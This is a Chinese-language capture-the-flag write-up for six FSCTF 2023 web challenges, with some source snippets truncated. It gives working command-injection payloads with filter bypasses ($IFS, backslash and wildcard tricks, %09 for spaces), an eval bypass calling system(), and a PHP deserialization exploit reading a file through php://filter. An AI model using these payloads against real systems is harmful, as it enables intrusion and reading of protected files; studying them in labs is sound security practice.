[FSCTF 2023] web题解

文章目录

    • 源码!启动!
    • webshell是啥捏
    • 细狗2.0
    • ez_php1
    • Hello,you
    • EZ_eval


源码!启动!

打开题目,发现右键被禁了
直接ctrl+u查看源码得到flag
[FSCTF 2023] web题解_第1张图片

webshell是啥捏

源码


php中变量与变量之间用点号连接表示拼接
题目拼接结果为passthru
那么我们直接ls / [FSCTF 2023] web题解_第2张图片
得到flag
[FSCTF 2023] web题解_第3张图片

细狗2.0

简单的命令执行绕过
payload

?hongzh0=;ca\t$IFS$1/fl*g

得到flag
[FSCTF 2023] web题解_第4张图片

ez_php1

源码

 

分析一下,就是简单的MD5绕过和php解析特性
得到hint
[FSCTF 2023] web题解_第5张图片访问./L0vey0U.php


exp

得到第二个hint
[FSCTF 2023] web题解_第6张图片访问./P0int.php

a = file_get_contents("php://filter/read=convert.base64-encode/resource=g0t_f1ag.php");
    }
    public function __destruct()
    {
        echo $this->b;
    }
}
@unserialize($_POST['data']);

?> 

非常简单的变量引用
exp如下

b=&$C->a;
echo serialize($C);

[FSCTF 2023] web题解_第7张图片
解码得到flag
[FSCTF 2023] web题解_第8张图片

Hello,you

简单的命令注入,用分号隔断命令

1;ls

[FSCTF 2023] web题解_第9张图片
反斜杠绕过和星号绕过

1;ca\t f*

[FSCTF 2023] web题解_第10张图片

EZ_eval

源码

". $word);
}else{
    highlight_file(__FILE__);
}

简单分析下,eval函数中已经闭合前面?>,那么我们要自己输入php的头,由于问号被过滤了
这里用secript(文件上传做的多会很快想到),然后就是一些常规过滤,用%09代替空格,反斜杠绕过关键字检测

?word=system('ca\t%09/fl\ag');

得到flag
[FSCTF 2023] web题解_第11张图片

你可能感兴趣的:(CTF比赛,前端,web安全,php,学习)